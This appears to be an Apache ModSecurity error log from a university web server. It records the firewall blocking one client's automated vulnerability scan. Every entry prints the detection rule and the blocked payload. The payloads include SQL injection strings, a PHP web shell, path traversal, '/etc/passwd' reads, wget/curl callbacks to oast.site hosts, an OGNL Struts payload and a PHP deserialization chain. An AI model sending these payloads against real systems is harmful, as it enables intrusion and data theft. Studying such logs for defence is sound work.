[Tue Aug 29 11:34:33.343215 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATTmRIAAAAV"]
[Tue Aug 29 11:34:35.343283 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAASEJWgAAAAE"]
[Tue Aug 29 11:34:37.333945 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUZcEgAAABO"]
[Tue Aug 29 11:34:38.331684 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATWYQoAAAAa"]
[Tue Aug 29 11:34:38.334007 2023] [:error] [pid 1287] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgddfsok48j9914.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUHKKwAAAA-"]
[Tue Aug 29 11:34:38.335858 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgp3p39369bf7we.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAAT9POUAAAA1"]
[Tue Aug 29 11:34:41.309075 2023] [:error] [pid 1229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATNJZUAAAAF"]
[Tue Aug 29 11:34:42.354381 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAUQ7roAAABH"]
[Tue Aug 29 11:34:44.308493 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUB01UAAAA5"]
[Tue Aug 29 11:34:49.312756 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAUOaT0AAABG"]
[Tue Aug 29 11:34:49.315903 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAATXLLcAAAAb"]
[Tue Aug 29 11:34:49.327795 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUFdfAAAAA9"]
[Tue Aug 29 11:34:49.335649 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATXLLgAAAAb"]
[Tue Aug 29 11:34:51.581723 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATWYRUAAAAa"]
[Tue Aug 29 11:34:51.936890 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAATmZdoAAAAr"]
[Tue Aug 29 11:34:52.311886 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATQXhcAAAAO"]
[Tue Aug 29 11:34:53.320083 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgbxugiibfz38uw.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAAUXLjMAAABM"]
[Tue Aug 29 11:34:53.340285 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAARjjXAAAAAL"]
[Tue Aug 29 11:34:53.347097 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAUCJd8AAAA6"]
[Tue Aug 29 11:34:55.301483 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAUKhAUAAABC"]
[Tue Aug 29 11:34:56.344032 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAATSkn0AAAAT"]
[Tue Aug 29 11:34:56.346418 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAAUQ7sMAAABH"]
[Tue Aug 29 11:34:56.351494 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAPLwJ8AAAAX"]
[Tue Aug 29 11:34:57.316712 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUUZ8cAAABK"]
[Tue Aug 29 11:34:57.372123 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAUCJeUAAAA6"]
[Tue Aug 29 11:34:58.314441 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATxvYsAAAAw"]
[Tue Aug 29 11:34:58.319324 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAATSkn4AAAAT"]
[Tue Aug 29 11:34:59.325087 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAAULx8sAAABD"]
[Tue Aug 29 11:35:01.332950 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATXLMcAAAAb"]
[Tue Aug 29 11:35:02.347761 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATPtTAAAAAM"]
[Tue Aug 29 11:35:02.359620 2023] [:error] [pid 1268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAT0eC0AAAAy"]
